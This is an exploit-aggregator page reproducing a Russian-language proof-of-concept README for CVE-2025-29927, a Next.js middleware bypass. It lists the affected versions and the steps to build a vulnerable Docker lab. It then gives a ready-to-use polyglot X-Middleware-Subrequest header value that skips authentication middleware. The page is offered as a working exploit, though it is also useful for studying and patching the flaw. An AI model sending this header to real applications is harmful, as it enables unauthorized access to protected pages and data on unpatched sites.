Sploitus

Exploit for CVE-2025-29927-PoC

kitploit · 2026-08-27

Exploit Code

MARKDOWN75 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ALIHUSSAINZADA-CVE-2025-29927-POC
# CVE-2025-29927: PoC обхода промежуточного ПО Next.js

Этот репозиторий демонстрирует уязвимость CVE-2025-29927 в Next.js, где внутренний заголовок `x-middleware-subrequest` может использоваться для обхода проверок промежуточного ПО, таких как аутентификация.

## Затронутые версии

  * Next.js 15.x < 15.2.3
  * Next.js 14.x < 14.2.25
  * Next.js 13.x < 13.5.9



## Шаги для воспроизведения

### 1\. Клонируйте репозиторий:

root@kitploit:~
    
    
    git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
    

### 2\. Перейдите в папку проекта:

root@kitploit:~
    
    
    cd CVE-2025-29927-PoC
    

### 3\. Сгенерируйте секрет:

root@kitploit:~
    
    
    openssl rand -base64 32
    

### 4\. Обновите секрет в файле `.env`:

root@kitploit:~
    
    
    NEXTAUTH_SECRET=your_generated_secret
    

### 5\. Соберите и запустите с помощью Docker:

root@kitploit:~
    
    
    docker build -t nextjs .
    docker run -p 3000:3000 --env-file .env nextjs
    

## Доказательство концепции

Мы можем значительно упростить эксплуатацию этой проблемы, используя полиглот, который позволяет эффективно охватывать различные возможные случаи. Нам удалось добиться этого с помощью следующего HTTP-заголовка, используемого для проверки наличия обхода аутентификации:

root@kitploit:~
    
    
    X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
    

![Перенаправление пользователей](https://assets.kitploit.com/production/public/readmes/22482/92b630f695c1c02b6d55c58e068cac77590ce187e78f9e11cdcff1f204da3b70.png)

![Пример эксплуатации](https://assets.kitploit.com/production/public/readmes/22482/d89567a123aebfd42ee4845d2e1fe419290693d20117ab7fd0e26d317a357dd2.png)

## Авторы/Источники

  * Блог Next.js о CVE-2025-29927
  * Исследование Zhero Web Security: Next.js и повреждённое промежуточное ПО
  * Исследование Assetnote Security: анализ обхода промежуточного ПО Next.js